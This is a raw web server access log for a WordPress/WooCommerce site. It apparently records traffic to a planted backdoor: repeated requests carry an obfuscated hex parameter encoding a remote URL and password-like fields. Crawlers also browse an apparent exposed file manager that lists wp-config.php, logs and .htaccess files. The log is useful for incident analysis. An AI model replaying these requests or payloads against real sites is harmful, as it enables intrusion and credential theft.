107.191.43.201 - - [14/May/2026:07:41:44 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323530342p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735383930342q6639356137346666376138633133636537663839336636646238303634333835222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:47:03 -0400] "GET /p/bale%2011423824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2Ftw-sack.min.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs HTTP/1.0" 200 7792 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:07:47:04 -0400] "GET /?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel HTTP/1.0" 200 7185 "https://ascensionfitnessusa.naluendorse.com/?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel/style.css&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [14/May/2026:07:42:04 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323532342p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735383932342q3631373931303333386263333735376234316635343933666139656238643537222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [14/May/2026:07:42:24 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323534342p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735383934342q3235633339396266656263316361343835376436386166613137356337633765222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:47:33 -0400] "GET /p/bale%2010587824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fuploads%2Fwc-logs%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fuploads%2Fwc-logs HTTP/1.0" 200 6738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:42:44 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323536342p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735383936342q6139643132353461313536356564343838356633363331643639333931376561222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [14/May/2026:07:47:56 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-item/style.min.css&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-item HTTP/1.0" 200 6777 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-item" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:07:48:04 -0400] "GET /p/ball%2020135825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Ffonts%2Fdashicons.ttf&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Ffonts HTTP/1.0" 200 6642 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:43:04 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323538342p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735383938342q3336666363663435313064663738633561356466313761326434376634323636222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [14/May/2026:07:43:24 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323630342p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393030342q3866383938636130306566633863616263306339633230323936663335626461222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:48:36 -0400] "GET /p/bale%2011423824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fimages%2Fcrystal%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fimages%2Fcrystal HTTP/1.0" 200 6741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:07:48:43 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-item/style-rtl.css&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-item HTTP/1.0" 200 6789 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-item" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [14/May/2026:07:45:25 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323732352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393132352q3433613931333339333738333837636630356264366363623262633530636464222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:49:08 -0400] "GET /p/ball%2020883825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fai1wm-backups%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fai1wm-backups HTTP/1.0" 200 6732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:07:49:22 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/style-engine/class-wp-style-engine-css-declarations.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/style-engine HTTP/1.0" 200 7969 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/style-engine" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:07:49:39 -0400] "GET /p/ball%2022175825?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fimages%2Fimages HTTP/1.0" 200 7169 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:07:49:48 -0400] "GET /p/bale%2010587824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fuploads%2Fnalu%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fuploads%2Fnalu HTTP/1.0" 200 6735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:07:50:19 -0400] "GET /p/bale%2012575824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fbbpress%2Flicense.txt&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fbbpress HTTP/1.0" 200 12184 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:07:50:28 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/style-engine/class-wp-style-engine-css-rule.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/style-engine HTTP/1.0" 200 8039 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/style-engine" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [14/May/2026:07:46:24 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323738342p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393138342q3838333739666539346335313938373938613731643564613165663763366366222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [14/May/2026:07:45:49 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323734392p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393134392q6462646433333035363333656563346136653039326234663630303832663363222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:50:53 -0400] "GET /p/beef%2030199826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs%2Fprivacy-tools.min.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs HTTP/1.0" 200 8351 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:07:51:23 -0400] "GET /p/beef%2031519826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Faccordion%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Faccordion HTTP/1.0" 200 6666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:07:51:29 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/style-engine/class-wp-style-engine-css-rules-store.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/style-engine HTTP/1.0" 200 7669 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/style-engine" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:07:51:30 -0400] "GET /p/atom%2021307817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-config.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs HTTP/1.0" 200 8399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:07:52:01 -0400] "GET /p/beef%2032587826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages%2Falign-none-2x.png&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/1.0" 200 6643 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:46:45 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323830352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393230352q3461326537313763623739623963326631356431386537316332396331636631222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:52:15 -0400] "GET /p/beef%2030271826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Flogs%2Faccess_ssl_log.processed.7.gz&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Flogs HTTP/1.0" 200 6622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:47:05 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323832352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393232352q6461326139623131353839626635326434336662366331666432643637303665222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [14/May/2026:07:52:25 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/woocommerce/assets/client/admin/embed/style.css&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/woocommerce/assets/client/admin/embed HTTP/1.0" 200 15158 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/woocommerce/assets/client/admin/embed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [14/May/2026:07:47:25 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323834352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393234352q6631383532363939373864376631363337366635643733333130343532336362222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:52:45 -0400] "GET /p/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fmah.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com HTTP/1.0" 200 9769 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:47:45 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323836352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393236352q6265336134313434653761636434323538333065363337393834636132636331222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [14/May/2026:07:53:14 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel/style-rtl.min.css&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel HTTP/1.0" 200 6701 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/accordion-panel" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:07:53:18 -0400] "GET /p/beef%2031335826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fclass-IXR.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 7805 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:48:05 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323838352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393238352q6130666362636339306538663736363431663334316530346135646630303830222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [14/May/2026:07:48:25 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323930352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393330352q3261643538323132626237623732383031623737383565356335373266356135222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:53:50 -0400] "GET /p/atom%2021795817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages%2Ficons32-2x.png&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/1.0" 200 6644 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:07:53:59 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/template-part/editor.min.css&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/template-part HTTP/1.0" 200 6944 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/blocks/template-part" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:07:54:09 -0400] "GET /robots.txt HTTP/1.0" 200 4271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:48:45 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736323932352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393332352q6433366363613830343430306562636238646636666335326666653062656462222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.37 - - [14/May/2026:07:54:17 -0400] "GET /p/ball%2022175825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fadmin-ajax.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin HTTP/1.0" 200 8376 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [14/May/2026:07:50:46 -0400] "GET /wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/Version2/index.php?ARRAY=7o2230223n313737383736333034362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383735393434362q3630616465323330306235356331373461626131373234623531333133353634222p2232223n223463333534643933393736636563616535303562333033343634363836663233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q34312q35382q37302q37382q38392q3139227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [14/May/2026:07:54:38 -0400] "GET /?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core/kits HTTP/1.0" 200 7147 "https://ascensionfitnessusa.naluendorse.com/?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core/kits/documents/tabs/settings-custom-css.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/core/kits/documents/tabs" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:07:54:48 -0400] "GET /p/atom%2021795817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Flink-manager.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin HTTP/1.0" 200 8391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.37 - - [14/May/2026:07:55:13 -0400] "GET /p/ball%2022031825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fincludes%2Fdeprecated.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fincludes HTTP/1.0" 200 12185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [14/May/2026:07:55:15 -0400] "GET /?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules HTTP/1.0" 200 8740 "https://ascensionfitnessusa.naluendorse.com/?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules/global-classes/usage/css-class-usage.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/elementor/modules/global-classes/usage" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.37 - - [14/May/2026:07:55:46 -0400] "GET /p/ball%2022031825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fms-delete-site.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin HTTP/1.0" 200 8515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
